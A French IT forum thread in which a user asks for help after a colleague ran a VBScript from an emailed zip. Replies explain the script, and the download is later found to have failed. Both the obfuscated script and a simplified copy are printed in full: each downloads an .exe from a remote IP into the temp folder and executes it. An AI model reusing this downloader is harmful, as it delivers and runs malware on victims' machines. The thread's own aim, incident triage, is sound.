Soltek Posted January 28, 2015 Hello, Malgré notre firewall, antispam et antivirus, une collègue un reçu et lancé un script contenu dans une archive zip.Je vous copie/colle le contenue : Dim KDhnYBYFkCfnMjsyxDhPb KDhnYBYFkCfnMjsyxDhPb = "GYVknOOhGywVqmXmqbfPJwq"If KDhnYBYFkCfnMjsyxDhPb = "GYVknOOhGywVqmXmqbfPJwq" ThenEnd IfWScript.Sleep 4000Dim IDYVbPrSxIOQmVHlhhrMe IDYVbPrSxIOQmVHlhhrMe = "wxDxNGcmgbXsKhpRiATSSrY"If IDYVbPrSxIOQmVHlhhrMe = "wxDxNGcmgbXsKhpRiATSSrY" ThenEnd IfDim pWLDnIbAxcaFeCLyYVoMl pWLDnIbAxcaFeCLyYVoMl = "mfKUNJRzFLLpbeRwtxmrRgj"If pWLDnIbAxcaFeCLyYVoMl = "mfKUNJRzFLLpbeRwtxmrRgj" ThenEnd Ifpath = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%")Dim jbOpkfGOcOSqeMWQsOtIV jbOpkfGOcOSqeMWQsOtIV = "vJieaxacOqWxnvUjZAkSeam"If jbOpkfGOcOSqeMWQsOtIV = "vJieaxacOqWxnvUjZAkSeam" ThenEnd Ifpath = path & "\"Dim bPKzPmlstEgupMlzTGcLE bPKzPmlstEgupMlzTGcLE = "gTnMSRmHhzWzyvuTlYyGNuM"If bPKzPmlstEgupMlzTGcLE = "gTnMSRmHhzWzyvuTlYyGNuM" ThenEnd IfURL = "http://192.99.19.178/xdde.exe"Dim UBuVzItKFfJxfYuSyMXRp UBuVzItKFfJxfYuSyMXRp = "ychzWoRwNLZXDHPuxyeoGnu"If UBuVzItKFfJxfYuSyMXRp = "ychzWoRwNLZXDHPuxyeoGnu" ThenEnd IfDJ = "foyoun.exe" Dim GiTlDQmIBtHlTvWlSngxD GiTlDQmIBtHlTvWlSngxD = "ldxtdRwqMOVkpklhgtRsxUB"If GiTlDQmIBtHlTvWlSngxD = "ldxtdRwqMOVkpklhgtRsxUB" ThenEnd Ifdim GH: Set GH = createobject("Microsoft.XMLHTTP")Dim oCvKtmDggbKnfwaqsfiHn oCvKtmDggbKnfwaqsfiHn = "kpcbBajIKTiwpyQfdihoxuz"If oCvKtmDggbKnfwaqsfiHn = "kpcbBajIKTiwpyQfdihoxuz" ThenEnd Ifdim NJ: Set NJ = createobject("Adodb.Stream")Dim XYYujdiLRWsDGyQrMdTdI XYYujdiLRWsDGyQrMdTdI = "vEbwhbOSeXaViUcyJSnrOGf"If XYYujdiLRWsDGyQrMdTdI = "vEbwhbOSeXaViUcyJSnrOGf" ThenEnd IfGH.Open "GET", URL, FalseDim noJDsEnwMRwvIuMKrDqsQ noJDsEnwMRwvIuMKrDqsQ = "FPQwfZtQpANBJFanZwjpGJJ"If noJDsEnwMRwvIuMKrDqsQ = "FPQwfZtQpANBJFanZwjpGJJ" ThenEnd IfGH.SendDim lJfIDLwdMkgxsqlxCSqdl lJfIDLwdMkgxsqlxCSqdl = "ABPauxKipqOKAcFvwbIyiIi"If lJfIDLwdMkgxsqlxCSqdl = "ABPauxKipqOKAcFvwbIyiIi" ThenEnd IfDim LvwsgIYDgarbKxryMxqEo LvwsgIYDgarbKxryMxqEo = "sMhQFNffWaUwwAAuOdvhCNJ"If LvwsgIYDgarbKxryMxqEo = "sMhQFNffWaUwwAAuOdvhCNJ" ThenEnd Ifwith NJDim sIEULnfeEkUwMezeyNsVj sIEULnfeEkUwMezeyNsVj = "WWDGYwhefowCeMvXsIZlqFt"If sIEULnfeEkUwMezeyNsVj = "WWDGYwhefowCeMvXsIZlqFt" ThenEnd If .type = 1 '//binaryDim EfbFlmGxEemgogWpEexDs EfbFlmGxEemgogWpEexDs = "HEpmlRhJSUTZxpeuDWcrSAl"If EfbFlmGxEemgogWpEexDs = "HEpmlRhJSUTZxpeuDWcrSAl" ThenEnd If .openDim bVARHccOjqvnFoOVovgLe bVARHccOjqvnFoOVovgLe = "wctpujUkjdZvWTsjKLKAEJj"If bVARHccOjqvnFoOVovgLe = "wctpujUkjdZvWTsjKLKAEJj" ThenEnd If .write GH.responseBodyDim ROuABfAUaQknyFlzXwkgu ROuABfAUaQknyFlzXwkgu = "IHiGcttPUBcEOtDtSwzwZtm"If ROuABfAUaQknyFlzXwkgu = "IHiGcttPUBcEOtDtSwzwZtm" ThenEnd If .savetofile path & DJ, 2 '//overwriteDim jBOqyenfPJuctlqaxUrJI jBOqyenfPJuctlqaxUrJI = "SHKundUfAztpwFSYZOYuQrq"If jBOqyenfPJuctlqaxUrJI = "SHKundUfAztpwFSYZOYuQrq" ThenEnd Ifend withDim zEzFClGHhilWxXYPejjuT zEzFClGHhilWxXYPejjuT = "EFeSoMpZcKBvaEActYROrRN"If zEzFClGHhilWxXYPejjuT = "EFeSoMpZcKBvaEActYROrRN" ThenEnd IfDim zUeKUpPqPdbZxcuJwtsvA zUeKUpPqPdbZxcuJwtsvA = "AmLzDptYwWTuKWLQGlsoWJL"If zUeKUpPqPdbZxcuJwtsvA = "AmLzDptYwWTuKWLQGlsoWJL" ThenEnd Iffile = path & DJDim WqltKUVZZcPQsSPXrAioP WqltKUVZZcPQsSPXrAioP = "QjJUHlosvNZZkQOVRLunbij"If WqltKUVZZcPQsSPXrAioP = "QjJUHlosvNZZkQOVRLunbij" ThenEnd IfSet WshShell = WScript.CreateObject("WScript.Shell")Dim srTHesvHyvDBrVUtHvBgL srTHesvHyvDBrVUtHvBgL = "RSiSxLCMbUbtNPgrrbnwZrQ"If srTHesvHyvDBrVUtHvBgL = "RSiSxLCMbUbtNPgrrbnwZrQ" ThenEnd IfWshShell.Run chr(34) & file & chr(34) Elle m'a dit avoir vu une fenêtre noir s'ouvrir et se fermer donc le code s'est bien exécuté. Je ne suis pas dév du tout mais j'ai l'impression qu'il doit essayer d'aller télécharger un .exe et le lancer. Je ne sais pas si cela a fonctionné.Auriez-vous des pistes d'où je peux chercher s'il y a un problème sur son poste ? Qui est malheureusement encore... en XP (j'avais prévu de lui changer la semaine prochaine en plus >_<). Share this post Link to post Share on other sites
Xxxaaavvv Posted January 29, 2015 Code simplifié : WScript.Sleep 4000 path = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%") path = path & "\" URL = "http://xxx.xx.xx.xxx/xdde.exe" DJ = "foyoun.exe" dim GH: Set GH = createobject("Microsoft.XMLHTTP") dim NJ: Set NJ = createobject("Adodb.Stream") GH.Open "GET", URL, False GH.Send with NJ .type = 1 '//binary .open .write GH.responseBody .savetofile path & DJ, 2 '//overwrite end with file = path & DJ Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run chr(34) & file & chr(34) Donc oui il va chercher un fichier sur le net le télécharge dans le dossier temp et l'execute. Ta machine est vérolée. Share this post Link to post Share on other sites
Soltek Posted January 29, 2015 Merci. Le fichier foyoun.exe faisait 1ko donc je l'ai ouvert avec Notepad++ au cas où et il y avait ça dedans : <html><head><title> Hôte injoignable </title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> </head><body bgcolor="#E0E0FF"> <blockquote><h3>Le site que vous souhaitez interroger est actuellement indisponible. </h3></blockquote> </body> </html> Le site où il voulait récupérer le .exe vérolé est HS donc en fait ça va il ne s'est rien passé. Share this post Link to post Share on other sites
Aekyros Posted January 29, 2015 Méfie toi quand même, on ne sait jamais c'est ptet histoire de brouiller les pistes ! ^^ Share this post Link to post Share on other sites
Soltek Posted January 29, 2015 Je lui change son poste par un neuf demain J'en parlerai à mes collègues dév quand ils seront dispo quand même si jamais ça se reproduit, puis petite note d'info aux secrétaires de faire gaffe aux emails bizarres. Share this post Link to post Share on other sites
